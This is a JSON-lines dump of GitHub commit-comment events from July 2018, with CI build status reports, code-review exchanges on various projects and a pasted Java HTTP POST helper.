{"id":"8043838339","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29903521,"position":null,"line":null,"path":null,"commit_id":"751ea51101d69f11810cb3069d046674f2499039","created_at":"2018-07-31T12:47:00Z","updated_at":"2018-07-31T12:47:00Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 202](http://build.palaso.org/viewLog.html?buildId=125979&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:00"}},"created_at":"2018-07-31T12:47:00Z"}
{"id":"8043840995","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29903524,"position":null,"line":null,"path":null,"commit_id":"751ea51101d69f11810cb3069d046674f2499039","created_at":"2018-07-31T12:47:28Z","updated_at":"2018-07-31T12:47:28Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 200](http://build.palaso.org/viewLog.html?buildId=125978&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:02:28"}},"created_at":"2018-07-31T12:47:28Z"}
{"id":"8043841043","type":"CommitCommentEvent","actor":{"login":"lightmonk1911"},"repo":{"name":"lightmonk1911/project-lvl1-s320"},"payload":{"comment":{"id":29903525,"position":null,"line":null,"path":null,"commit_id":"f323559da6c183762e5d301fa4ee227bc938f793","created_at":"2018-07-31T12:47:29Z","updated_at":"2018-07-31T12:47:29Z","author_association":"OWNER","body":"tip in the bottom is implemented"}},"created_at":"2018-07-31T12:47:29Z"}
{"id":"8043851284","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903542,"position":278,"line":278,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:49:21Z","updated_at":"2018-07-31T12:49:21Z","author_association":"COLLABORATOR","body":"lots of vars and no semicolon. good job)"}},"created_at":"2018-07-31T12:49:21Z"}
{"id":"8043857999","type":"CommitCommentEvent","actor":{"login":"khardenstine"},"repo":{"name":"hyperfiddle/hyperfiddle"},"payload":{"comment":{"id":29903556,"position":16,"line":171,"path":"src/hyperfiddle/ide.cljc","commit_id":"d098e9b45c20c220960d5668680aaa4198e74b94","created_at":"2018-07-31T12:50:28Z","updated_at":"2018-07-31T12:50:28Z","author_association":"MEMBER","body":"This double browse is interesting.  :account is a root level link that could be addressed from anywhere.\r\nThe formula isn't predicated on topnav's data set at all, so in theory why cant it be accessed directly?\r\nBecause formulas are only written on the link side; if we also had formulas on the fiddle side this double browse would go away."}},"created_at":"2018-07-31T12:50:28Z"}
{"id":"8043859022","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903562,"position":279,"line":279,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:50:37Z","updated_at":"2018-07-31T12:50:37Z","author_association":"COLLABORATOR","body":"you can not afort one more variable like roundedRandom?"}},"created_at":"2018-07-31T12:50:37Z"}
{"id":"8043860068","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903567,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T12:50:49Z","updated_at":"2018-07-31T12:50:49Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2335 of 2335 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-31T12:50:49Z"}
{"id":"8043861076","type":"CommitCommentEvent","actor":{"login":"Pankraty"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903572,"position":104,"line":768,"path":"ClosedXML_Tests/Excel/CalcEngine/FunctionsTests.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T12:50:59Z","updated_at":"2018-07-31T12:50:59Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/19576939/43460514-e4f57194-94e1-11e8-9743-45d1af764ce0.png)\r\n"}},"created_at":"2018-07-31T12:50:59Z"}
{"id":"8043861091","type":"CommitCommentEvent","actor":{"login":"hyndavirohith"},"repo":{"name":"hyndavirohith/gerbil"},"payload":{"comment":{"id":29903573,"position":null,"line":null,"path":null,"commit_id":"cdb2660b521de337f33d5370393ed48038209490","created_at":"2018-07-31T12:50:59Z","updated_at":"2018-07-31T12:50:59Z","author_association":"OWNER","body":"It is just for testing purpose.Will revert back."}},"created_at":"2018-07-31T12:50:59Z"}
{"id":"8043863464","type":"CommitCommentEvent","actor":{"login":"Pankraty"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903578,"position":84,"line":748,"path":"ClosedXML_Tests/Excel/CalcEngine/FunctionsTests.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T12:51:23Z","updated_at":"2018-07-31T12:51:23Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/19576939/43460535-f2d678b2-94e1-11e8-98b5-a2ae54345b36.png)"}},"created_at":"2018-07-31T12:51:23Z"}
{"id":"8043867247","type":"CommitCommentEvent","actor":{"login":"Rainbowperfect"},"repo":{"name":"Rainbowperfect/perfect"},"payload":{"comment":{"id":29903583,"position":7,"line":null,"path":"PicController--校验是否为图片.java","commit_id":"ddb65432c39ac3c0578ccb6aa8f0177b3e8673c3","created_at":"2018-07-31T12:52:04Z","updated_at":"2018-07-31T12:52:04Z","author_association":"OWNER","body":"public static String sendPost(String url, String param, int timeOut) throws Exception {\n    \t\n        PrintWriter out = null;\n        BufferedReader in = null;\n        StringBuilder resultSB = new StringBuilder();\n        String errInfo = \"success\", rTime = \"\";\n        try {\n        \tlong startTime = System.currentTimeMillis(); //==================================请求起始时间_毫秒\n            URL realUrl = new URL(url);\n            // 打开和URL之间的连接\n            URLConnection conn = realUrl.openConnection();\n            // 设置通用的请求属性\n            conn.setRequestProperty(\"accept\", \"*/*\");\n            conn.setRequestProperty(\"connection\", \"Keep-Alive\");\n            conn.setRequestProperty(\"user-agent\", \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)\");\n            //设置超时\n            conn.setConnectTimeout(timeOut); //连接主机的超时时间（单位：毫秒）\n            conn.setReadTimeout(timeOut);    //设置从主机读取数据超时（单位：毫秒）\n            // 发送POST请求必须设置如下两行\n            conn.setDoOutput(true);\n            conn.setDoInput(true);\n            // 获取URLConnection对象对应的输出流\n            out = new PrintWriter(conn.getOutputStream());\n            // 发送请求参数\n            out.print(param);\n            // flush输出流的缓冲\n            out.flush();\n            // 定义BufferedReader输入流来读取URL的响应\n            in = new BufferedReader(new InputStreamReader(conn.getInputStream()));\n            long endTime = System.currentTimeMillis();\t//==================================请求结束时间_毫秒\n            String line;\n            while ((line = in.readLine()) != null) {\n            \tresultSB.append(line);\n            }\n            rTime = String.valueOf(endTime - startTime);\n        } catch (Exception e) {\n        \terrInfo = \"error\";\n            //System.out.println(\"发送 POST 请求出现异常！\"+e);\n            //e.printStackTrace();\n        \tthrow new MyExceptionBusiness(e);\n        }\n        //使用finally块来关闭输出流、输入流\n        finally{\n            try{\n                if(out != null){\n                    out.close();\n                }\n                if(in != null){\n                    in.close();\n                }\n            }\n            catch(IOException ex){\n                ex.printStackTrace();\n                //throw new MyExceptionBusiness(ex);\n            }\n        }\n        \n        return resultSB.toString();\n    }"}},"created_at":"2018-07-31T12:52:04Z"}
{"id":"8043867388","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29903584,"position":null,"line":null,"path":null,"commit_id":"de490206857fdade9567667ab42088f7de335ba9","created_at":"2018-07-31T12:52:06Z","updated_at":"2018-07-31T12:52:06Z","author_association":"MEMBER","body":"I'm not sure this is valid, let me check when I get out of bed"}},"created_at":"2018-07-31T12:52:06Z"}
{"id":"8043867442","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903585,"position":295,"line":295,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:52:07Z","updated_at":"2018-07-31T12:52:07Z","author_association":"COLLABORATOR","body":"every js file should end with blank string. if you'd have linter you'd now this)"}},"created_at":"2018-07-31T12:52:07Z"}
{"id":"8043867724","type":"CommitCommentEvent","actor":{"login":"Pankraty"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903587,"position":94,"line":758,"path":"ClosedXML_Tests/Excel/CalcEngine/FunctionsTests.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T12:52:10Z","updated_at":"2018-07-31T12:52:10Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/19576939/43460574-0fafb9a8-94e2-11e8-945e-649a1bab0b83.png)\r\n"}},"created_at":"2018-07-31T12:52:10Z"}
{"id":"8043873788","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903593,"position":10,"line":10,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:53:14Z","updated_at":"2018-07-31T12:53:14Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-31T12:53:14Z"}
{"id":"8043877532","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29903599,"position":13,"line":13,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-31T12:53:57Z","updated_at":"2018-07-31T12:53:57Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-31T12:53:57Z"}
{"id":"8043877714","type":"CommitCommentEvent","actor":{"login":"tufosa"},"repo":{"name":"DevoInc/nodejs-sdk"},"payload":{"comment":{"id":29903600,"position":4,"line":61,"path":"lib/sender.js","commit_id":"f3d3ba555bc6f666669b4f0ee844347024b65ec7","created_at":"2018-07-31T12:53:59Z","updated_at":"2018-07-31T12:53:59Z","author_association":"NONE","body":"remove this comment"}},"created_at":"2018-07-31T12:53:59Z"}
{"id":"8043882875","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903607,"position":295,"line":295,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:54:54Z","updated_at":"2018-07-31T12:54:54Z","author_association":"OWNER","body":"I create every day last string. My visual code delete this string automatic"}},"created_at":"2018-07-31T12:54:54Z"}
{"id":"8043884308","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29903609,"position":39,"line":46,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T12:55:10Z","updated_at":"2018-07-31T12:55:10Z","author_association":"OWNER","body":"не понятно! что значит: \" Тут получается преждевременная оптимизация. \" ?!\r\nТак это, что? плохо? Что-то не так работает? Я наоборот - старался свести все к минимуму и без повторов кода. forward_index используется в 2х местах: forward_station и go_forward . аналогично и backward_index.\r\nесли просто вычислять пред. станцию через current_index  - 1 , то получим когда-нибудь значение -1, и будет не предыдущая станция, а последняя.\r\nВ общем я действительно не понимаю, что вы хотите мне объяснить ((. С точки зрения работоспособности - все работает. \r\nНа какой вариант  развития решения вы меня подталкиваете я не догоняю.(("}},"created_at":"2018-07-31T12:55:10Z"}
{"id":"8043885208","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29903610,"position":14,"line":14,"path":"src/io/jiyuujin/java/day27/Main.java","commit_id":"56172d86d9c11af46699298fbabe6f3b5a87e23a","created_at":"2018-07-31T12:55:19Z","updated_at":"2018-07-31T12:55:19Z","author_association":"COLLABORATOR","body":"呼び先でやってるのは ```System.out.println() ``` だから\r\n``` \r\nLog.getCurrentThread();\r\n↓\r\nLog.printThreadName();\r\n```\r\nメソッド名しっかりつける癖つけて"}},"created_at":"2018-07-31T12:55:19Z"}
{"id":"8043888752","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903616,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T12:55:58Z","updated_at":"2018-07-31T12:55:58Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T12:55:58Z"}
{"id":"8043901131","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903643,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T12:58:11Z","updated_at":"2018-07-31T12:58:11Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (2964 of 2964 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T12:58:11Z"}
{"id":"8043904255","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903649,"position":1,"line":1,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T12:58:43Z","updated_at":"2018-07-31T12:58:43Z","author_association":"OWNER","body":"I know about let and const.Understand, i create const for this parametr. I don't change WIDTH.But latter i want create function for resize and this variable must be change."}},"created_at":"2018-07-31T12:58:43Z"}
{"id":"8043906388","type":"CommitCommentEvent","actor":{"login":"andrempo"},"repo":{"name":"luclala/IRremoteESP32"},"payload":{"comment":{"id":29903653,"position":null,"line":null,"path":null,"commit_id":"6cd88fae314ed9ef7e581d4836fdb1c540e6a844","created_at":"2018-07-31T12:59:06Z","updated_at":"2018-07-31T12:59:06Z","author_association":"NONE","body":"Could you get it to work with some protocols?"}},"created_at":"2018-07-31T12:59:06Z"}
{"id":"8043907337","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29903655,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-31T12:59:15Z","updated_at":"2018-07-31T12:59:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T12:59:15Z"}
{"id":"8043914541","type":"CommitCommentEvent","actor":{"login":"gabrielkagan"},"repo":{"name":"gabrielkagan/gabekagan"},"payload":{"comment":{"id":29903676,"position":null,"line":null,"path":null,"commit_id":"b2ad14ead93e736aba66ef3fe5da4ca344d4f0d2","created_at":"2018-07-31T13:00:33Z","updated_at":"2018-07-31T13:00:33Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-31T13:00:33Z"}
{"id":"8043916424","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29903682,"position":8,"line":18,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T13:00:53Z","updated_at":"2018-07-31T13:00:53Z","author_association":"OWNER","body":"да.. я забыл убрать attr_accessor :current_index.. \r\nвставлял его для проверки и изменения индекса в irb вручную"}},"created_at":"2018-07-31T13:00:53Z"}
{"id":"8043920563","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29903691,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T13:01:36Z","updated_at":"2018-07-31T13:01:36Z","author_association":"MEMBER","body":"@flyinghead Any idea why TextureUpscale set to a higher value (like 2 or 4) could cause crashes now with these changes to AICA/DSP? Yet more threading issues? Can't we just move to a more stable thread pool instead of that library?"}},"created_at":"2018-07-31T13:01:36Z"}
{"id":"8043920738","type":"CommitCommentEvent","actor":{"login":"mcurrr"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903692,"position":1,"line":1,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T13:01:38Z","updated_at":"2018-07-31T13:01:38Z","author_association":"COLLABORATOR","body":"this variable should NOT be changed, should create new variable in your resize-function."}},"created_at":"2018-07-31T13:01:38Z"}
{"id":"8043922319","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29903694,"position":6,"line":6,"path":"src/collective/ifttt/browser/manage_trigger.py","commit_id":"4f7f51df911a3b5da995e0de21a4144ce15068bf","created_at":"2018-07-31T13:01:55Z","updated_at":"2018-07-31T13:01:55Z","author_association":"COLLABORATOR","body":"@Shriyanshagro Please, fix `from views import availableTriggers` to use absolute import (`from collective.ifttt...`) instead. I believe that absolute imports are best practice in Python 2, and Python 3 has different syntax for relative imports..."}},"created_at":"2018-07-31T13:01:55Z"}
{"id":"8043926797","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29903702,"position":null,"line":null,"path":null,"commit_id":"279d066e1b68808a22c5fbc3f276a79f93a878e0","created_at":"2018-07-31T13:02:42Z","updated_at":"2018-07-31T13:02:42Z","author_association":"CONTRIBUTOR","body":"I tried using utility classes first, and kept getting build errors saying `cannot specialize a function 'set_tag' within class scope` and `no type named 'type' in 'std::__1::enable_if<false, void>'; 'enable_if' cannot be used to disable this declaration`."}},"created_at":"2018-07-31T13:02:42Z"}
{"id":"8043927130","type":"CommitCommentEvent","actor":{"login":"lmoore0621"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29903704,"position":null,"line":null,"path":null,"commit_id":"638c50c6bd42e356cef39706699429aff19be44e","created_at":"2018-07-31T13:02:46Z","updated_at":"2018-07-31T13:02:46Z","author_association":"NONE","body":"@hoangthan initialcreate is just letting you know that this is where you started your migrations... keep migrating as you change your database. This is the furthest you can revert back to in case you have made a mistake. You dont need to touch that cs file."}},"created_at":"2018-07-31T13:02:46Z"}
{"id":"8043929310","type":"CommitCommentEvent","actor":{"login":"mbruns42"},"repo":{"name":"CROSSINGTUD/CryptoAnalysis"},"payload":{"comment":{"id":29903713,"position":25,"line":51,"path":"CryptoAnalysisTargets/DataFlowImprecisionExample/src/main/DataFlowImprecisionExample.java","commit_id":"65e879e6ee2493ac47275cef30d883835247257e","created_at":"2018-07-31T13:03:10Z","updated_at":"2018-07-31T13:03:10Z","author_association":"COLLABORATOR","body":"I'm trying to test the cipher usage, not the key generator, and did not want to use the field for both as they are not independent."}},"created_at":"2018-07-31T13:03:10Z"}
{"id":"8043929649","type":"CommitCommentEvent","actor":{"login":"adamg88"},"repo":{"name":"BayLibre/u-boot"},"payload":{"comment":{"id":29903715,"position":null,"line":null,"path":null,"commit_id":"427ce42b1df536ef889bc051a164383d812f25df","created_at":"2018-07-31T13:03:14Z","updated_at":"2018-07-31T13:03:14Z","author_association":"NONE","body":"Great, thanks for the pointer"}},"created_at":"2018-07-31T13:03:14Z"}
{"id":"8043929906","type":"CommitCommentEvent","actor":{"login":"muxator"},"repo":{"name":"ether/etherpad-lite"},"payload":{"comment":{"id":29903716,"position":null,"line":null,"path":null,"commit_id":"a3ae374a67f898905e4ce12f5f92a02474f6b73a","created_at":"2018-07-31T13:03:16Z","updated_at":"2018-07-31T13:03:16Z","author_association":"CONTRIBUTOR","body":"Replaced long options with short ones in d23cf924c99f52816c9a0fdc496e5df7580d6203. Thanks @zorrikon for the review.\r\n"}},"created_at":"2018-07-31T13:03:16Z"}
{"id":"8043933797","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29903724,"position":44,"line":44,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T13:04:00Z","updated_at":"2018-07-31T13:04:00Z","author_association":"OWNER","body":"I don't see variable single letter name\r\nI delete underscore name (rename)"}},"created_at":"2018-07-31T13:04:00Z"}
{"id":"8043934865","type":"CommitCommentEvent","actor":{"login":"JDeuker"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903733,"position":84,"line":748,"path":"ClosedXML_Tests/Excel/CalcEngine/FunctionsTests.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T13:04:12Z","updated_at":"2018-07-31T13:04:12Z","author_association":"NONE","body":"Do you know whats happening here?"}},"created_at":"2018-07-31T13:04:12Z"}
{"id":"8043940811","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29903741,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T13:05:17Z","updated_at":"2018-07-31T13:05:17Z","author_association":"NONE","body":"Quick update: I was able to reproduce it with the OIT core on Windows. This happens when the thread pool is initializing and there seems to be some memory corruption at this point.\r\n\r\nI'm still investigating but if I find that this library is buggy or unstable I will use something else. But so far I haven't found the root cause of the problem."}},"created_at":"2018-07-31T13:05:17Z"}
{"id":"8043943130","type":"CommitCommentEvent","actor":{"login":"markaren"},"repo":{"name":"markaren/vcpkg"},"payload":{"comment":{"id":29903749,"position":null,"line":null,"path":null,"commit_id":"cd900dcd775dcb212e84dfb60b044291a1b74b4a","created_at":"2018-07-31T13:05:42Z","updated_at":"2018-07-31T13:05:42Z","author_association":"OWNER","body":"[Denne](https://github.com/markaren/vcpkg/blob/feature/fmilib/ports/fmilib/portfile.cmake) versjonen fungerer på begge platfromer. Bygger både debug og release for begge."}},"created_at":"2018-07-31T13:05:42Z"}
{"id":"8043945107","type":"CommitCommentEvent","actor":{"login":"igitur"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903756,"position":12,"line":12,"path":"ClosedXML/Excel/CalcEngine/Exceptions/NumberFormatException.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T13:06:04Z","updated_at":"2018-07-31T13:06:04Z","author_association":"MEMBER","body":"This new exception class isn't necessary. You should be throwing one of the existing exception classes. The one that aligns to whatever error Excel throws given the same inputs to the formula."}},"created_at":"2018-07-31T13:06:04Z"}
{"id":"8043946779","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iZeaoGamer/AliasReborn"},"payload":{"comment":{"id":29903762,"position":null,"line":null,"path":null,"commit_id":"62d1fb356118fae456810f1d3c8d214f5d27168a","created_at":"2018-07-31T13:06:21Z","updated_at":"2018-07-31T13:06:21Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iZeaoGamer/AliasReborn/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `843c24e8-94c2-11e8-9b3d-cdc4c642cda0`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-31T13:06:21Z"}
{"id":"8043947309","type":"CommitCommentEvent","actor":{"login":"Nekliukov"},"repo":{"name":"Nekliukov/ExtTraining.Summer.2018.3"},"payload":{"comment":{"id":29903763,"position":5,"line":12,"path":"No7.Solution/TradeParser.cs","commit_id":"5d75bcee0e7ef1c9939e40b631866578a0020924","created_at":"2018-07-31T13:06:27Z","updated_at":"2018-07-31T13:06:27Z","author_association":"OWNER","body":"Наверное решарпер автоматически подправил, сомневаюсь в необходимости partial"}},"created_at":"2018-07-31T13:06:27Z"}
{"id":"8043947558","type":"CommitCommentEvent","actor":{"login":"igitur"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903764,"position":42,"line":706,"path":"ClosedXML_Tests/Excel/CalcEngine/FunctionsTests.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T13:06:30Z","updated_at":"2018-07-31T13:06:30Z","author_association":"MEMBER","body":"Create a new test to test exceptions."}},"created_at":"2018-07-31T13:06:30Z"}
{"id":"8043950195","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903773,"position":60,"line":78,"path":"chemie/events/api/serializers.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:07:01Z","updated_at":"2018-07-31T13:07:01Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:07:01Z"}
{"id":"8043950752","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903776,"position":69,"line":95,"path":"chemie/events/api/serializers.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:07:08Z","updated_at":"2018-07-31T13:07:08Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:07:08Z"}
{"id":"8043951370","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903781,"position":80,"line":118,"path":"chemie/events/api/serializers.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:07:14Z","updated_at":"2018-07-31T13:07:14Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:07:14Z"}
